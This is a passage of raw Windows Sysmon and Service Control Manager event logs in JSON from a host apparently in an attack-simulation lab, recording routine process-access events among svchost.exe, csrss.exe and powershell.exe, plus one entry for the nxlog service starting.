{41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":917,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":918,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":919,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":920,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":921,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76823,"ProcessID":856,"ThreadID":1116,"Channel":"System","Message":"The nxlog service entered the running state.","param1":"nxlog","param2":"running","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":922,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1084\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {00000000-0000-0000-0000-000000000000}\r\nTargetProcessId: 2080\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+389a|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1084","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{00000000-0000-0000-0000-000000000000}","TargetProcessId":"2080","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+389a|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":923,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.846\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {00000000-0000-0000-0000-000000000000}\r\nTargetProcessId: 2080\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.846","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{00000000-0000-0000-0000-000000000000}","TargetProcessId":"2080","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":924,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.862\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 